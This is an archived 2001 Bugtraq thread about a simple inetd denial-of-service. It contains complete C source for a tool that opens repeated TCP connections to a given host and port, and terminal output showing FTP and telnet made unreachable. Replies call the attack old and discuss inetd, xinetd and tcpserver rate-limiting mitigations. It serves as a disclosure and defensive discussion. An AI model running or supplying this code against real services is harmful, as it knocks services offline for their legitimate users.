6143919 2001-02-25 19:26 +0300 /44 rader/ Serega[linux] <linux@IHGROUP.RU>
Sänt av: joel@lysator.liu.se
Importerad: 2001-02-26 23:35 av Brevbäraren (som är implementerad i) Python
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: linux@IHGROUP.RU
Mottagare: Bugtraq (import) <15627>
Ärende: inetd DoS exploit
------------------------------------------------------------
Name: inetd DoS exploit
Author: Serega[Linux]
[ser@ihg prog]$ ./pscaner -h 127.0.0.1 /* it's my port scaner */
Open ports on [127.0.0.1]
-----------------------------
[21] OPEN : 220 ihg.localhost FTP server (Version wu-6.6.6(5) Sat Feb 17 15:10:44 MSK 2001) ready.
[23] OPEN :
[25] OPEN : 220 ihg.localhost ESMTP Sendmail 8.11.0/8.11.0; Sun, 25 Feb 2001 18:58:36 +0300
-----------------------------
[ser@ihg prog]$ telnet 127.0.0.1 21 Trying 127.0.0.1... Connected to
127.0.0.1. Escape character is '^]'. 220 ihg.localhost FTP server
(Version wu-6.6.6(5) Sat Feb 17 15:10:44 MSK 2001) ready.
[ser@ihg prog]$ cc inetddos.c -o inetddos
[ser@ihg prog]$ ./inetddos 127.0.0.1 21
DoS OK
[ser@ihg prog]$ telnet 127.0.0.1 21
Trying 127.0.0.1...
telnet: Unable to connect to remote host: Connection refused
[ser@ihg prog]$ telnet 127.0.0.1 23
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
login:
[ser@ihg prog]$ ./inetddos 127.0.0.1 23
DoS OK
[ser@ihg prog]$ telnet 127.0.0.1 23
Trying 127.0.0.1...
telnet: Unable to connect to remote host: Connection refused
--
/*
* mailto:linux@ihgroup.ru
* ICQ: 64432299
* Home Page: http://127.0.0.1
*/
(6143919) --------------------------------(Ombruten)
Bilaga (text/x-c) i text 6143920
Kommentar i text 6147997 av Jose Nazario <jose@BIOCSERVER.BIOC.CWRU.EDU>
Kommentar i text 6148375 av Peter Werner <peterw@DOCUMENTA.COM.AU>
Kommentar i text 6148607 av Peter van Dijk <peter@DATALOSS.NL>
6143920 2001-02-25 19:26 +0300 /133 rader/ Serega[linux] <linux@IHGROUP.RU>
Bilagans filnamn: "inetddos.c"
Importerad: 2001-02-26 23:35 av Brevbäraren (som är implementerad i) Python
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: linux@IHGROUP.RU
Mottagare: Bugtraq (import) <15628>
Bilaga (text/plain) till text 6143919
Ärende: Bilaga (inetddos.c) till: inetd DoS exploit
------------------------------------------------------------
/*
----------------------------------
Inetd DoS exploit bY Serega[Linux]
IHG Project www.ihgroup.ru
mailto:linux@ihgroup.ru
----------------------------------
Usage: ./inetddos <host> <port>
example:
[ser@ihg prog]$ ./pscaner -h 127.0.0.1
-----------------------------
Open ports on [127.0.0.1]
[21] OPEN : 220 ihg.localhost FTP server (Version wu-6.6.6(5) Sat Feb 17 15:10:44 MSK 2001) ready.
[23] OPEN :
[25] OPEN : 220 ihg.localhost ESMTP Sendmail 8.11.0/8.11.0; Sun, 25 Feb 2001 18:58:36 +0300
-----------------------------
[ser@ihg prog]$ telnet 127.0.0.1 21 Trying 127.0.0.1... Connected to
127.0.0.1. Escape character is '^]'. 220 ihg.localhost FTP server
(Version wu-6.6.6(5) Sat Feb 17 15:10:44 MSK 2001) ready.
[ser@ihg prog]$ cc inetddos.c -o inetddos
[ser@ihg prog]$ ./inetddos 127.0.0.1 21
DoS OK
[ser@ihg prog]$ telnet 127.0.0.1 21
Trying 127.0.0.1...
telnet: Unable to connect to remote host: Connection refused
[ser@ihg prog]$ telnet 127.0.0.1 23
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
login:
[ser@ihg prog]$ ./inetddos 127.0.0.1 23
DoS OK
[ser@ihg prog]$ telnet 127.0.0.1 23
Trying 127.0.0.1...
telnet: Unable to connect to remote host: Connection refused
*/
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <time.h>
#include <signal.h>
void time_out(int sig);
int timeout=5;
char logo[512];
int sockfd;
DoS (char *host, int port)
{
unsigned long int ip_addr;
struct sockaddr_in serv;
struct hostent *h;
unsigned long int rv;
serv.sin_family = AF_INET;
if ((h=gethostbyname(host)) == NULL)
{
close(sockfd);
perror(host);
exit(1);
}
if(h!=NULL)
memcpy(&rv,h->h_addr,h->h_length);
else
rv=inet_addr(host);
serv.sin_addr.s_addr = rv;
serv.sin_port = htons(port);
if ((sockfd = socket (AF_INET, SOCK_STREAM, 0)) == -1)
{
perror ("socket error");
exit(1);
}
alarm(timeout);
signal(SIGALRM, (void *)&time_out);
if (connect (sockfd, (struct sockaddr*)&serv, sizeof(serv)) != 0)
{
close(sockfd);
perror(host);
exit(1);
}
alarm(0);
close(sockfd);
return(1);
}
void time_out (int sig)
{
close(sockfd);
printf("timeout\n");
exit(-1);
}
usage(char *h)
{
printf("----------------------------------\nInetd DoS exploit bY Serega[Linux]
IHG Project www.ihgroup.ru
mailto:linux@ihgroup.ru\n----------------------------------\n");
printf("\nUsage: %s <host> <port>\n\n", h);
exit(1);
}
main(int argc, char **argv)
{
int i;
if (argc<3) usage(argv[0]);
for (i=1; i<1000; i++)
DoS(argv[1], atoi(argv[2]));
printf("DoS failed\n");
}
(6143920) --------------------------------(Ombruten)
6147997 2001-02-26 16:39 -0500 /55 rader/ Jose Nazario <jose@BIOCSERVER.BIOC.CWRU.EDU>
Sänt av: joel@lysator.liu.se
Importerad: 2001-02-27 19:51 av Brevbäraren (som är implementerad i) Python
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: jose@BIOCSERVER.BIOC.CWRU.EDU
Mottagare: Bugtraq (import) <15635>
Kommentar till text 6143919 av Serega[linux] <linux@IHGROUP.RU>
Ärende: Re: inetd DoS exploit
------------------------------------------------------------
From: Jose Nazario <jose@BIOCSERVER.BIOC.CWRU.EDU>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <Pine.LNX.4.30.0102261633260.29130-100000@biocserver.BIOC.CWRU.Edu>
On Sun, 25 Feb 2001, Serega[linux] wrote:
> [ser@ihg prog]$ cc inetddos.c -o inetddos
> [ser@ihg prog]$ ./inetddos 127.0.0.1 21
> DoS OK
(code snipped)
*hrm* ok. this is old. see also the inetd process table attack.
http://www.interesting-people.org/199902/0069.html
this can be stemmed in a number of ways:
1] using inetd, rate limit the connections. change a line like
telnet stream tcp nowait root /usr/libexec/telnetd telnetd
to
telnet stream tcp nowait.1 root /usr/libexec/telnetd telnetd
this will maximize the number of connections per minute on that
service:
(from an inetd manpage on OpenBSD 2.8)
The optional ``max'' suffix (separated from ``wait'' or ``nowait'' by
a dot) specifies the maximum number of server instances that may be
spawned from inetd within an interval of 60 seconds. When omitted,
``max'' defaults to 40.
2] inetd -R. (again from OpenBSD's 2.8 manpage for inetd)
-R rate
Specify the maximum number of times a service can be invoked
in one minute; the default is 256.
i believe the inetd in Linux, which is derived from BSD's inetd, has
these features. at least the last time i looked at the code (eons
ago) it did.
3] move to xinetd or other similar programs which have rate limiting.
solar designer has a neat-o patch for xinetd that can do max-per-IP
limits. very nice ... :)
anyhow, old, mitigations are alreay in place, just learn to use them.
____________________________
jose nazario jose@cwru.edu
PGP: 89 B0 81 DA 5B FD 7E 00 99 C3 B2 CD 48 A0 07 80
PGP key ID 0xFD37F4E5 (pgp.mit.edu)
(6147997) --------------------------------(Ombruten)
Kommentar i text 6149616 av David Malone <dwmalone@MATHS.TCD.IE>
Kommentar i text 6149708 av Charles M. Hannum <root@IHACK.NET>
6149616 2001-02-27 19:33 +0000 /23 rader/ David Malone <dwmalone@MATHS.TCD.IE>
Sänt av: joel@lysator.liu.se
Importerad: 2001-02-28 09:28 av Brevbäraren (som är implementerad i) Python
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: dwmalone@MATHS.TCD.IE
Mottagare: Bugtraq (import) <15671>
Kommentar till text 6147997 av Jose Nazario <jose@BIOCSERVER.BIOC.CWRU.EDU>
Ärende: Re: inetd DoS exploit
------------------------------------------------------------
From: David Malone <dwmalone@MATHS.TCD.IE>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <20010227193341.A88613@walton.maths.tcd.ie>
On Mon, Feb 26, 2001 at 04:39:58PM -0500, Jose Nazario wrote:
> 3] move to xinetd or other similar programs which have rate limiting.
> solar designer has a neat-o patch for xinetd that can do max-per-IP
> limits. very nice ... :)
FreeBSD's inetd has a selection of features like like this (maximum
number of invocations of a service, max number of invocations per
minute and the max number of invocations per minute per ip).
I think these features must be relatively recent additions to inetd
'cos the syntax for them is slightly different in FreeBSD and
OpenBSD. (A little poking around CVS trees shows that the max-child
feature was originally added in NetBSD 1993 and added to FreeBSD
in 1996. The overall rate limit and rate/ip limit may have originated
in FreeBSD at a later date - possibly cogged from xinetd.)
David.
(6149616) ------------------------------------------
6149708 2001-02-27 12:18 -0800 /32 rader/ Charles M. Hannum <root@IHACK.NET>
Sänt av: joel@lysator.liu.se
Importerad: 2001-02-28 09:46 av Brevbäraren (som är implementerad i) Python
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: root@IHACK.NET
Mottagare: Bugtraq (import) <15674>
Kommentar till text 6147997 av Jose Nazario <jose@BIOCSERVER.BIOC.CWRU.EDU>
Ärende: Re: inetd DoS exploit
------------------------------------------------------------
From: "Charles M. Hannum" <root@IHACK.NET>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <20010227121814.E29838@mail.netbsd.org>
On Mon, Feb 26, 2001 at 04:39:58PM -0500, Jose Nazario wrote:
> this can be stemmed in a number of ways:
>
> 1] using inetd, rate limit the connections. change a line like
>
> telnet stream tcp nowait root /usr/libexec/telnetd telnetd
>
> to
>
> telnet stream tcp nowait.1 root /usr/libexec/telnetd telnetd
>
> this will maximize the number of connections per minute on that service:
>
> (from an inetd manpage on OpenBSD 2.8)
Actually, that was implemented in NetBSD. But regardless, it's not
sufficient. All that does is adjust the threshold at which inetd
decides the server is `looping' and disables it. Setting it to 1, for
example, just makes the problem *much* worse. Setting it to, e.g.,
1000000 will effectively disable the hack, and is a reasonable
workaround if your machine can deal.
The real answer is to implement proper rate-limiting instead. A bonus
would be to implement it in a library (say, libwrap) that standalone
and `wait' services can also use.
(6149708) ------------------------------------------
6148375 2001-02-27 09:39 +1100 /81 rader/ Peter Werner <peterw@DOCUMENTA.COM.AU>
Sänt av: joel@lysator.liu.se
Importerad: 2001-02-27 21:43 av Brevbäraren (som är implementerad i) Python
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: peterw@DOCUMENTA.COM.AU
Mottagare: Bugtraq (import) <15642>
Kommentar till text 6143919 av Serega[linux] <linux@IHGROUP.RU>
Ärende: Re: inetd DoS exploit
------------------------------------------------------------
From: Peter Werner <peterw@DOCUMENTA.COM.AU>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <010701c0a044$edf2b360$0900a8c0@documenta.com.au>
NAME
inetd - internet ``super-server''
SYNOPSIS
inetd [-d] [-R rate] [configuration file]
....
-R rate
Specify the maximum number of times a service can be
invoked in
one minute; the default is 256.
isnt this a feature of inetd?
ie, it stops answering request's for a service when the maximum
number has been reached?
did you wait ~10 minutes to try reconnect? or does inetd/box
actually need to be restarted?
----- Original Message -----
From: Serega[linux] <linux@IHGROUP.RU>
To: <BUGTRAQ@SECURITYFOCUS.COM>
Sent: Monday, February 26, 2001 3:26 AM
Subject: [BUGTRAQ] inetd DoS exploit
> Name: inetd DoS exploit
> Author: Serega[Linux]
>
>
> [ser@ihg prog]$ ./pscaner -h 127.0.0.1 /* it's my port scaner
*/
> Open ports on [127.0.0.1]
> -----------------------------
> [21] OPEN : 220 ihg.localhost FTP server (Version wu-6.6.6(5) Sat
Feb 17 15:10:44 MSK 2001) ready.
> [23] OPEN :
> [25] OPEN : 220 ihg.localhost ESMTP Sendmail 8.11.0/8.11.0; Sun,
25 Feb 2001 18:58:36 +0300
> -----------------------------
>
> [ser@ihg prog]$ telnet 127.0.0.1 21
> Trying 127.0.0.1...
> Connected to 127.0.0.1.
> Escape character is '^]'.
> 220 ihg.localhost FTP server (Version wu-6.6.6(5) Sat Feb 17
15:10:44 MSK 2001) ready.
>
> [ser@ihg prog]$ cc inetddos.c -o inetddos
> [ser@ihg prog]$ ./inetddos 127.0.0.1 21
> DoS OK
> [ser@ihg prog]$ telnet 127.0.0.1 21
> Trying 127.0.0.1...
> telnet: Unable to connect to remote host: Connection refused
> [ser@ihg prog]$ telnet 127.0.0.1 23
> Trying 127.0.0.1...
> Connected to 127.0.0.1.
> Escape character is '^]'.
> login:
>
> [ser@ihg prog]$ ./inetddos 127.0.0.1 23
> DoS OK
> [ser@ihg prog]$ telnet 127.0.0.1 23
> Trying 127.0.0.1...
> telnet: Unable to connect to remote host: Connection refused
>
> --
> /*
> * mailto:linux@ihgroup.ru
> * ICQ: 64432299
> * Home Page: http://127.0.0.1
> */
>
(6148375) ------------------------------------------
6148607 2001-02-27 02:02 +0100 /22 rader/ Peter van Dijk <peter@DATALOSS.NL>
Sänt av: joel@lysator.liu.se
Importerad: 2001-02-27 22:48 av Brevbäraren (som är implementerad i) Python
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: peter@DATALOSS.NL
Mottagare: Bugtraq (import) <15648>
Kommentar till text 6143919 av Serega[linux] <linux@IHGROUP.RU>
Ärende: Re: inetd DoS exploit
------------------------------------------------------------
From: Peter van Dijk <peter@DATALOSS.NL>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <20010227020216.C21881@dataloss.nl>
On Sun, Feb 25, 2001 at 07:26:07PM +0300, Serega[linux] wrote:
> Name: inetd DoS exploit
> Author: Serega[Linux]
This is a *very* old and widely-known inetd DoS. It comes down making
inetd's ratelimiting kick in. Recent inetd's (like the one that comes
with FreeBSD) also have concurrencylimiting, which makes sense.
Ratelimiting has never prevented a malicious client from crashing a
server.
inetd replacements like xinetd and tcpserver
(http://cr.yp.to/ucspi-tcp.html) have real ratelimiting which
preventes *real* problems, as opposed to inetd ratelimiting which
actually only *creates* problems.
Greetz, Peter.
(6148607) ------------------------------------------
Kommentar i text 6149555 av bert hubert <ahu@DS9A.NL>